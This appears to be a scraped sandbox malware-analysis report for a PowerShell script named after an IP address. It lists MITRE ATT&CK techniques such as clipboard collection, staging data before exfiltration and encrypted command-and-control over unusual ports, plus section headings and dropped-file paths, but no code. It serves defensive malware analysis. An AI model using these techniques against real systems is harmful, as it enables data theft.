Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 92.255.57.112.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mpt3r00s.b1d.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mukhjors.re4.ps1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JCZQKXY5ZQZRQ57IWPWJ.temp

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

DNS Answers

Statistics

CPU Usage

Windows Analysis Report
92.255.57.112.ps1